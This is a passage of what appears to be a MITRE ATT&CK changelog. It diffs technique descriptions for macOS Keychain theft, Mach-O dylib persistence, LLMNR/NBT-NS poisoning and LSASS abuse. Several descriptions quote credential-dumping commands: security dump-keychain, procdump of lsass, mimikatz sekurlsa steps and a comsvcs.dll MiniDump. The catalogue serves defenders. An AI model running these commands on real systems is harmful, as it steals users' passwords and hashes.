| external_references[16]['url'] | https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/ | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf |
| external_references[17]['source_name'] | Apple Developer Configuration Profile | Synack Secure Kernel Extension Broken |
| external_references[17]['description'] | Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021. | Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018. |
| external_references[17]['url'] | https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf | https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ |
| x_mitre_data_sources[3] | File: File Creation | Process: Process Creation |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Wikipedia Loadable Kernel Module', 'description': 'Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.', 'url': 'https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux'} | |
| x_mitre_contributors | Eric Kaiser @ideologysec | |
| x_mitre_data_sources | File: File Creation |
| Old Description | New Description |
|---|---|
Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials. |
Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.
Keychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)
Adversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain –d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-17 13:14:31.140000+00:00 | 2022-04-18 20:32:22.122000+00:00 |
| description | Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials. |
Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.
Keychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)
Adversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain –d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) |
| external_references[1]['source_name'] | Wikipedia keychain | External to DA, the OS X Way |
| external_references[1]['description'] | Wikipedia. (n.d.). Keychain (software). Retrieved July 5, 2017. | Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Keychain_(software) | http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way |
| external_references[2]['source_name'] | External to DA, the OS X Way | Keychain Services Apple |
| external_references[2]['description'] | Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017. | Apple. (n.d.). Keychain Services. Retrieved April 11, 2022. |
| external_references[2]['url'] | http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way | https://developer.apple.com/documentation/security/keychain_services |
| x_mitre_data_sources[3] | File: File Access | Process: Process Creation |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Empire Keychain Decrypt', 'description': 'Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.', 'url': 'https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py'} | |
| external_references | {'source_name': 'OSX Keychain Schaumann', 'description': 'Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.', 'url': 'https://www.netmeister.org/blog/keychain-passwords.html'} | |
| external_references | {'source_name': 'Keychain Decryption Passware', 'description': 'Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.', 'url': 'https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption'} | |
| x_mitre_data_sources | File: File Access |
| Old Description | New Description |
|---|---|
| Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) | Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-30 00:51:58.454000+00:00 | 2022-04-20 17:08:21.101000+00:00 |
| description | Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) | Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X) |
| external_references[1]['source_name'] | Writing Bad Malware for OSX | Malware Persistence on OS X |
| external_references[1]['description'] | Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. | Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017. |
| external_references[1]['url'] | https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf |
| external_references[2]['source_name'] | Malware Persistence on OS X | Writing Bad Malware for OSX |
| external_references[2]['description'] | Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017. | Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. |
| external_references[2]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Modification |
| x_mitre_data_sources[2] | File: File Metadata | Command: Command Execution |
| x_mitre_data_sources[3] | File: File Modification | Module: Module Load |
| x_mitre_data_sources[4] | Module: Module Load | File: File Metadata |
| Old Description | New Description |
|---|---|
| By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder) | By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 3.0.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-28 13:09:50.809000+00:00 | 2022-10-25 15:46:55.393000+00:00 |
| description | By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder) | By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder) |
| external_references[1]['source_name'] | Wikipedia LLMNR | Rapid7 LLMNR Spoofer |
| external_references[1]['description'] | Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017. | Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution | https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response |
| external_references[2]['source_name'] | TechNet NetBIOS | GitHub Responder |
| external_references[2]['description'] | Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017. | Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017. |
| external_references[2]['url'] | https://technet.microsoft.com/library/cc958811.aspx | https://github.com/SpiderLabs/Responder |
| external_references[3]['source_name'] | byt3bl33d3r NTLM Relaying | Secure Ideas SMB Relay |
| external_references[3]['description'] | Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019. | Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019. |
| external_references[3]['url'] | https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html | https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html |
| external_references[4]['source_name'] | Secure Ideas SMB Relay | TechNet NetBIOS |
| external_references[4]['description'] | Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019. | Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017. |
| external_references[4]['url'] | https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html | https://technet.microsoft.com/library/cc958811.aspx |
| external_references[6]['source_name'] | Rapid7 LLMNR Spoofer | GitHub Conveigh |
| external_references[6]['description'] | Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017. | Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017. |
| external_references[6]['url'] | https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response | https://github.com/Kevin-Robertson/Conveigh |
| external_references[7]['source_name'] | GitHub Responder | byt3bl33d3r NTLM Relaying |
| external_references[7]['description'] | Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017. | Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019. |
| external_references[7]['url'] | https://github.com/SpiderLabs/Responder | https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html |
| external_references[9]['source_name'] | GitHub Conveigh | Wikipedia LLMNR |
| external_references[9]['description'] | Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017. | Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017. |
| external_references[9]['url'] | https://github.com/Kevin-Robertson/Conveigh | https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Andrew Allen, @whitehat_zero | |
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| Old Description | New Description |
|---|---|
| Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. | Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 16:52:26.567000+00:00 | 2022-04-20 16:34:43.405000+00:00 |
| description | Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. | Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. |
| external_references[1]['source_name'] | Microsoft Security Subsystem | Microsoft LSA Protection Mar 2014 |
| external_references[1]['description'] | Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017. | Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017. |
| external_references[1]['url'] | https://technet.microsoft.com/library/cc961760.aspx | https://technet.microsoft.com/library/dn408187.aspx |
| external_references[2]['source_name'] | Microsoft LSA Protection Mar 2014 | Microsoft DLL Security |
| external_references[2]['description'] | Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017. | Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017. |
| external_references[2]['url'] | https://technet.microsoft.com/library/dn408187.aspx | https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx |
| external_references[3]['source_name'] | Microsoft DLL Security | Microsoft Security Subsystem |
| external_references[3]['description'] | Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017. | Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017. |
| external_references[3]['url'] | https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx | https://technet.microsoft.com/library/cc961760.aspx |
| x_mitre_data_sources[2] | Driver: Driver Load | File: File Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Driver: Driver Load |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Creation |
| Old Description | New Description |
|---|---|
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: * rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection) |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
* sekurlsa::Minidump lsassdump.dmp
* sekurlsa::logonPasswords
Built-in Windows tools such as comsvcs.dll can also be used:
* rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
|
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 19:55:01.368000+00:00 | 2022-10-06 16:16:53.388000+00:00 |
